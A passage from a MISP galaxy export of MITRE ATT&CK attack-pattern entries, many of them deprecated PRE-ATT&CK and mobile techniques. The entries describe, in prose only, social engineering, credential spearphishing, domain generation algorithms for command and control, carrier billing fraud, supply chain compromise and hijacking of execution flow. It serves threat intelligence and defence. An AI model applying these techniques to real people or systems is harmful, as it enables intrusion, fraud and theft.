Determine firmware version - T1258

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1258).

Firmware is permanent software programmed into the read-only memory of a device. As with other types of software, firmware may be updated over time and have multiple versions. (Citation: Abdelnur Advanced Fingerprinting)

The tag is: misp-galaxy:mitre-attack-pattern="Determine firmware version - T1258"

Table 5912. Table References

Links

https://attack.mitre.org/techniques/T1258

Identify supply chains - T1276

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1276).

Supply chains include the people, processes, and technologies used to move a product or service from a supplier to a consumer. Understanding supply chains may provide an adversary with opportunities to exploit organizational relationships. (Citation: SmithSupplyChain) (Citation: CERT-UKSupplyChain)

The tag is: misp-galaxy:mitre-attack-pattern="Identify supply chains - T1276"

Identify supply chains - T1276 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Identify supply chains - T1265" with estimative-language:likelihood-probability="almost-certain"

Table 5913. Table References

Links

https://attack.mitre.org/techniques/T1276

Conduct social engineering - T1268

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1268).

Social Engineering is the practice of manipulating people in order to get them to divulge information or take an action. (Citation: SEAttackVectors) (Citation: BeachSE2003)

The tag is: misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1268"

Conduct social engineering - T1268 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1249" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1279" with estimative-language:likelihood-probability="almost-certain"

Table 5914. Table References

Links

https://attack.mitre.org/techniques/T1268

Assess targeting options - T1296

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1296).

An adversary may assess a target’s operational security (OPSEC) practices in order to identify targeting options. A target may share different information in different settings or be more of less cautious in different environments. (Citation: Scasny2015) (Citation: EverstineAirStrikes)

The tag is: misp-galaxy:mitre-attack-pattern="Assess targeting options - T1296"

Table 5915. Table References

Links

https://attack.mitre.org/techniques/T1296

Analyze data collected - T1287

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1287).

An adversary will assess collected information such as software/hardware versions, vulnerabilities, patch level, etc. They will analyze technical scanning results to identify weaknesses in the confirmation or architecture. (Citation: SurveyDetectionStrategies) (Citation: CyberReconPaper) (Citation: RSA-APTRecon) (Citation: FireEyeAPT28)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze data collected - T1287"

Table 5916. Table References

Links

https://attack.mitre.org/techniques/T1287

Conduct social engineering - T1279

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1279).

Social Engineering is the practice of manipulating people in order to get them to divulge information or take an action. (Citation: SEAttackVectors) (Citation: BeachSE2003)

The tag is: misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1279"

Conduct social engineering - T1279 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1268" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1249" with estimative-language:likelihood-probability="almost-certain"

Table 5917. Table References

Links

https://attack.mitre.org/techniques/T1279

Access Call Log - T1433

On Android, an adversary could call standard operating system APIs from a malicious application to gather call log data, or with escalated privileges could directly access files containing call log data.

On iOS, applications do not have access to the call log, so privilege escalation would be required in order to access the data.

The tag is: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433"

Table 5918. Table References

Links

https://attack.mitre.org/techniques/T1433

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html

Create backup infrastructure - T1339

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1339).

Backup infrastructure allows an adversary to recover from environmental and system failures. It also facilitates recovery or movement to other infrastructure if the primary infrastructure is discovered or otherwise is no longer viable. (Citation: LUCKYCAT2012)

The tag is: misp-galaxy:mitre-attack-pattern="Create backup infrastructure - T1339"

Table 5919. Table References

Links

https://attack.mitre.org/techniques/T1339

Remotely Install Application - T1443

An adversary with control of a target’s Google account can use the Google Play Store’s remote installation capability to install apps onto the Android devices associated with the Google account as described in (Citation: Oberheide-RemoteInstall), (Citation: Konoth). However, only applications that are available for download through the Google Play Store can be remotely installed using this technique.

Detection: An EMM/MDM or mobile threat protection solution can identify the presence of unwanted or known insecure or malicious apps on devices.

Platforms: Android

The tag is: misp-galaxy:mitre-attack-pattern="Remotely Install Application - T1443"

Remotely Install Application - T1443 has relationships with:

  • revoked-by: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"

Table 5920. Table References

Links

https://attack.mitre.org/techniques/T1443

Abuse Accessibility Features - T1453

This technique has been deprecated. Please use [Input Capture](https://attack.mitre.org/techniques/T1417), [Input Injection](https://attack.mitre.org/techniques/T1516), and [Input Prompt](https://attack.mitre.org/techniques/T1411) where appropriate.

A malicious app could abuse Android’s accessibility features to capture sensitive data or perform other malicious actions.(Citation: Skycure-Accessibility)

Adversaries may abuse accessibility features on Android to emulate a user’s clicks, for example to steal money from a user’s bank account.(Citation: android-trojan-steals-paypal-2fa)(Citation: banking-trojans-google-play)

Adversaries may abuse accessibility features on Android devices to evade defenses by repeatedly clicking the "Back" button when a targeted app manager or mobile security app is launched, or when strings suggesting uninstallation are detected in the foreground. This effectively prevents the malicious application from being uninstalled.(Citation: android-trojan-steals-paypal-2fa)

The tag is: misp-galaxy:mitre-attack-pattern="Abuse Accessibility Features - T1453"

Table 5921. Table References

Links

https://attack.mitre.org/techniques/T1453

https://www.skycure.com/blog/accessibility-clickjacking/

https://www.welivesecurity.com/2018/10/24/banking-trojans-continue-surface-google-play/

https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/

Access Calendar Entries - T1435

An adversary could call standard operating system APIs from a malicious application to gather calendar entry data, or with escalated privileges could directly access files containing calendar data.

The tag is: misp-galaxy:mitre-attack-pattern="Access Calendar Entries - T1435"

Table 5922. Table References

Links

https://attack.mitre.org/techniques/T1435

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html

Create custom payloads - T1345

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1345).

A payload is the part of the malware which performs a malicious action. The adversary may create custom payloads when none exist with the needed capability or when targeting a specific environment. (Citation: APT1)

The tag is: misp-galaxy:mitre-attack-pattern="Create custom payloads - T1345"

Table 5923. Table References

Links

https://attack.mitre.org/techniques/T1345

Manipulate Device Communication - T1463

If network traffic between the mobile device and a remote server is not securely protected, then an attacker positioned on the network may be able to manipulate network communication without being detected. For example, FireEye researchers found in 2014 that 68% of the top 1,000 free applications in the Google Play Store had at least one Transport Layer Security (TLS) implementation vulnerability potentially opening the applications' network traffic to adversary-in-the-middle attacks (Citation: FireEye-SSL).

The tag is: misp-galaxy:mitre-attack-pattern="Manipulate Device Communication - T1463"

Table 5924. Table References

Links

https://attack.mitre.org/techniques/T1463

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-1.html

https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html

Commonly Used Port - T1436

Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection.

They may use commonly open ports such as

  • TCP:80 (HTTP)

  • TCP:443 (HTTPS)

  • TCP:25 (SMTP)

  • TCP/UDP:53 (DNS)

They may use the protocol associated with the port or a completely different protocol.

The tag is: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1436"

Table 5925. Table References

Links

https://attack.mitre.org/techniques/T1436

Application Layer Protocol - T1437

Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the mobile device, and often the results of those commands, will be embedded within the protocol traffic between the mobile device and server.

Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS.

The tag is: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1437"

Table 5926. Table References

Links

https://attack.mitre.org/techniques/T1437

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-29.html

Domain Generation Algorithms - T1483

Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)

DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)

Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)

The tag is: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1483"

Table 5927. Table References

Links

http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html

http://csis.pace.edu/ctappert/srd2017/2017PDF/d4.pdf

http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf

https://arxiv.org/pdf/1611.00791.pdf

https://attack.mitre.org/techniques/T1483

https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html

https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/

https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/

https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/

https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html

https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/

Transmitted Data Manipulation - T1493

Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: misp-galaxy:mitre-attack-pattern="Transmitted Data Manipulation - T1493"

Table 5928. Table References

Links

https://attack.mitre.org/techniques/T1493

https://content.fireeye.com/apt/rpt-apt38

https://www.justice.gov/opa/press-release/file/1092091/download

Subvert Trust Controls - T1553

Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site.

Adversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [Modify Registry](https://attack.mitre.org/techniques/T1112) in support of subverting these controls.(Citation: SpectorOps Subverting Trust Sept 2017) Adversaries may also create or steal code signing certificates to acquire trust on target systems.(Citation: Securelist Digital Certificates)(Citation: Symantec Digital Certificates)

The tag is: misp-galaxy:mitre-attack-pattern="Subvert Trust Controls - T1553"

Table 5929. Table References

Links

http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates

https://attack.mitre.org/techniques/T1553

https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec

https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/

https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf

Revert Cloud Instance - T1536

An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.

Another variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)

The tag is: misp-galaxy:mitre-attack-pattern="Revert Cloud Instance - T1536"

Table 5930. Table References

Links

https://attack.mitre.org/techniques/T1536

https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots

https://www.techrepublic.com/blog/the-enterprise-cloud/backing-up-and-restoring-snapshots-on-amazon-ec2-machines/

Test callback functionality - T1356

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1356).

Callbacks are malware communications seeking instructions. An adversary will test their malware to ensure the appropriate instructions are conveyed and the callback software can be reached. (Citation: LeeBeaconing)

The tag is: misp-galaxy:mitre-attack-pattern="Test callback functionality - T1356"

Table 5931. Table References

Links

https://attack.mitre.org/techniques/T1356

Cloud Service Dashboard - T1538

An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)

Depending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests.

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Service Dashboard - T1538"

Table 5932. Table References

Links

https://attack.mitre.org/techniques/T1538

https://cloud.google.com/security-command-center/docs/quickstart-scc-dashboard

https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-event-reference-aws-console-sign-in-events.html

Remote Access Software - T1663

Adversaries may use legitimate remote access software, such as VNC, TeamViewer, AirDroid, AirMirror, etc., to establish an interactive command and control channel to target mobile devices.

Remote access applications may be installed and used post-compromise as an alternate communication channel for redundant access or as a way to establish an interactive remote session with the target device. They may also be used as a component of malware to establish a reverse connection to an adversary-controlled system or service. Installation of remote access tools may also include persistence.

The tag is: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1663"

Table 5933. Table References

Links

https://attack.mitre.org/techniques/T1663

Protected User Data - T1636

Adversaries may utilize standard operating system APIs to collect data from permission-backed data stores on a device, such as the calendar or contact list. These permissions need to be declared ahead of time. On Android, they must be included in the application’s manifest. On iOS, they must be included in the application’s Info.plist file.

In almost all cases, the user is required to grant access to the data store that the application is trying to access. In recent OS versions, vendors have introduced additional privacy controls for users, such as the ability to grant permission to an application only while the application is being actively used by the user.

If the device has been jailbroken or rooted, an adversary may be able to access [Protected User Data](https://attack.mitre.org/techniques/T1636) without the user’s knowledge or approval.

The tag is: misp-galaxy:mitre-attack-pattern="Protected User Data - T1636"

Table 5934. Table References

Links

https://attack.mitre.org/techniques/T1636

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html

Disseminate removable media - T1379

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1379).

Removable media containing malware can be injected in to a supply chain at large or small scale. It can also be physically placed for someone to find or can be sent to someone in a more targeted manner. The intent is to have the user utilize the removable media on a system where the adversary is trying to gain access. (Citation: USBMalwareAttacks) (Citation: FPDefendNewDomain) (Citation: ParkingLotUSB)

The tag is: misp-galaxy:mitre-attack-pattern="Disseminate removable media - T1379"

Table 5935. Table References

Links

https://attack.mitre.org/techniques/T1379

Spearphishing for Information - T1397

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1397).

Spearphishing for information is a specific variant of spearphishing. Spearphishing for information is different from other forms of spearphishing in that it it doesn’t leverage malicious code. All forms of spearphishing are elctronically delivered social engineering targeted at a specific individual, company, or industry. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials, without involving malicious code. Spearphishing for information frequently involves masquerading as a source with a reason to collect information (such as a system administrator or a bank) and providing a user with a website link to visit. The given website often closely resembles a legitimate site in appearance and has a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the attacker. Spearphishing for information may also try to obtain information directly through the exchange of emails, instant messengers or other electronic conversation means. (Citation: ATTACKREF GRIZZLY STEPPE JAR)

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing for Information - T1397"

Table 5936. Table References

Links

https://attack.mitre.org/techniques/T1397

Ingress Tool Transfer - T1544

Adversaries may transfer tools or other files from an external system onto a compromised device to facilitate follow-on actions. Files may be copied from an external adversary-controlled system through the command and control channel or through alternate protocols with another tool such as FTP.

The tag is: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1544"

Table 5937. Table References

Links

https://attack.mitre.org/techniques/T1544

Malicious SMS Message - T1454

Test

The tag is: misp-galaxy:mitre-attack-pattern="Malicious SMS Message - T1454"

Malicious SMS Message - T1454 has relationships with:

  • revoked-by: misp-galaxy:mitre-attack-pattern="Exploit via Radio Interfaces - T1477" with estimative-language:likelihood-probability="almost-certain"

Table 5938. Table References

Links

https://attack.mitre.org/techniques/T1454

Supply Chain Compromise - T1474

Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.

Supply chain compromise can take place at any stage of the supply chain including:

  • Manipulation of development tools

  • Manipulation of a development environment

  • Manipulation of source code repositories (public or private)

  • Manipulation of source code in open-source dependencies

  • Manipulation of software update/distribution mechanisms

  • Compromised/infected system images

  • Replacement of legitimate software with modified versions

  • Sales of modified/counterfeit products to legitimate distributors

  • Shipment interdiction

While supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. Targeting may be specific to a desired victim set or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency, specifically with the widespread usage of third-party advertising libraries.(Citation: Grace-Advertisement)(Citation: NowSecure-RemoteCode)

The tag is: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1474"

Table 5939. Table References

Links

https://attack.mitre.org/techniques/T1474

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-6.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-0.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-1.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-10.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-11.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-12.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-13.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-14.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-15.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-16.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-17.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-18.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-19.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-2.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-20.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-21.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-3.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-4.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-5.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-6.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-7.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-8.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-9.html

https://www.csc2.ncsu.edu/faculty/xjiang4/pubs/WISEC12_ADRISK.pdf

https://www.nowsecure.com/blog/2015/06/15/a-pattern-for-remote-code-execution-using-arbitrary-file-writes-and-multidex-applications/

Delete Device Data - T1447

Adversaries may wipe a device or delete individual files in order to manipulate external outcomes or hide activity. An application must have administrator access to fully wipe the device, while individual files may not require special permissions to delete depending on their storage location. (Citation: Android DevicePolicyManager 2019)

Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The impact file deletion will have depends on the type of data as well as the goals and objectives of the adversary, but can include deleting update files to evade detection or deleting attacker-specified files for impact.

The tag is: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447"

Table 5940. Table References

Links

https://attack.mitre.org/techniques/T1447

https://developer.android.com/reference/android/app/admin/DevicePolicyManager.html

Carrier Billing Fraud - T1448

A malicious app may trigger fraudulent charges on a victim’s carrier billing statement in several different ways, including SMS toll fraud and SMS shortcodes that make purchases.

Performing SMS fraud relies heavily upon the fact that, when making SMS purchases, the carriers perform device verification but not user verification. This allows adversaries to make purchases on behalf of the user, with little or no user interaction.(Citation: Google Bread)

Malicious applications may also perform toll billing, which occurs when carriers provide payment endpoints over a web page. The application connects to the web page over cellular data so the carrier can directly verify the number, or the application must retrieve a code sent via SMS and enter it into the web page.(Citation: Google Bread)

On iOS, apps cannot send SMS messages.

On Android, apps must hold the SEND_SMS permission to send SMS messages. Additionally, Android version 4.2 and above has mitigations against this threat by requiring user consent before allowing SMS messages to be sent to premium numbers (Citation: AndroidSecurity2014).

The tag is: misp-galaxy:mitre-attack-pattern="Carrier Billing Fraud - T1448"

Table 5941. Table References

Links

https://attack.mitre.org/techniques/T1448

https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html

https://static.googleusercontent.com/media/source.android.com/en//security/reports/Google_Android_Security_2014_Report_Final.pdf

Domain Policy Modification - T1484

Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments. Domains provide a centralized means of managing how computer resources (ex: computers, user accounts) can act, and interact with each other, on a network. The policy of the domain also includes configuration settings that may apply between domains in a multi-domain/forest environment. Modifications to domain settings may include altering domain Group Policy Objects (GPOs) or changing trust settings for domains, including federation trusts.

With sufficient permissions, adversaries can modify domain policy settings. Since domain configuration settings control many of the interactions within the Active Directory (AD) environment, there are a great number of potential attacks that can stem from this abuse. Examples of such abuse include modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) or modifying domain trusts to include an adversary controlled domain where they can control access tokens that will subsequently be accepted by victim domain resources.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks) Adversaries can also change configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207).

Adversaries may temporarily modify domain policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.

The tag is: misp-galaxy:mitre-attack-pattern="Domain Policy Modification - T1484"

Table 5942. Table References

Links

http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/

https://adsecurity.org/?p=2716

https://attack.mitre.org/techniques/T1484

https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-office-365

https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml

https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/

https://us-cert.cisa.gov/ncas/alerts/aa21-008a

https://wald0.com/?p=179

https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/

https://www.sygnia.co/golden-saml-advisory

Runtime Data Manipulation - T1494

Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1042) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: misp-galaxy:mitre-attack-pattern="Runtime Data Manipulation - T1494"

Table 5943. Table References

Links

https://attack.mitre.org/techniques/T1494

https://content.fireeye.com/apt/rpt-apt38

https://www.justice.gov/opa/press-release/file/1092091/download

Exploit Baseband Vulnerability - T1455

A message sent over a radio interface (typically cellular, but potentially Bluetooth, GPS, NFC, Wi-Fi or other) to the mobile device could exploit a vulnerability in code running on the device.

  1. Komaromy and N. Golde demonstrated baseband exploitation of a Samsung mobile device at the PacSec 2015 security conference (Citation: Register-BaseStation).

Weinmann described and demonstrated "the risk of remotely exploitable memory corruptions in cellular baseband stacks." (Citation: Weinmann-Baseband)

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Exploit Baseband Vulnerability - T1455"

Exploit Baseband Vulnerability - T1455 has relationships with:

  • revoked-by: misp-galaxy:mitre-attack-pattern="Exploit via Radio Interfaces - T1477" with estimative-language:likelihood-probability="almost-certain"

Table 5944. Table References

Links

https://attack.mitre.org/techniques/T1455

Event Triggered Execution - T1546

Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events.(Citation: Backdooring an AWS account)(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)

Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware)

Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges.

The tag is: misp-galaxy:mitre-attack-pattern="Event Triggered Execution - T1546"

Table 5945. Table References

Links

https://attack.mitre.org/techniques/T1546

https://medium.com/daniel-grzelak/backdooring-an-aws-account-da007d36f8f9

https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf

https://www.microsoft.com/security/blog/2020/03/09/real-life-cybercrime-stories-dart-microsoft-detection-and-response-team

https://www.varonis.com/blog/power-automate-data-exfiltration

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Malicious Media Content - T1457

Content of a media (audio or video) file could be designed to exploit vulnerabilities in parsers on the mobile device, as for example demonstrated by the Android Stagefright vulnerability (Citation: Zimperium-Stagefright).

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Malicious Media Content - T1457"

Malicious Media Content - T1457 has relationships with:

  • revoked-by: misp-galaxy:mitre-attack-pattern="Drive-By Compromise - T1456" with estimative-language:likelihood-probability="almost-certain"

Table 5946. Table References

Links

https://attack.mitre.org/techniques/T1457

Hijack Execution Flow - T1574

Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.

There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.

The tag is: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574"

Table 5947. Table References

Links

https://attack.mitre.org/techniques/T1574

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

Plist File Modification - T1647

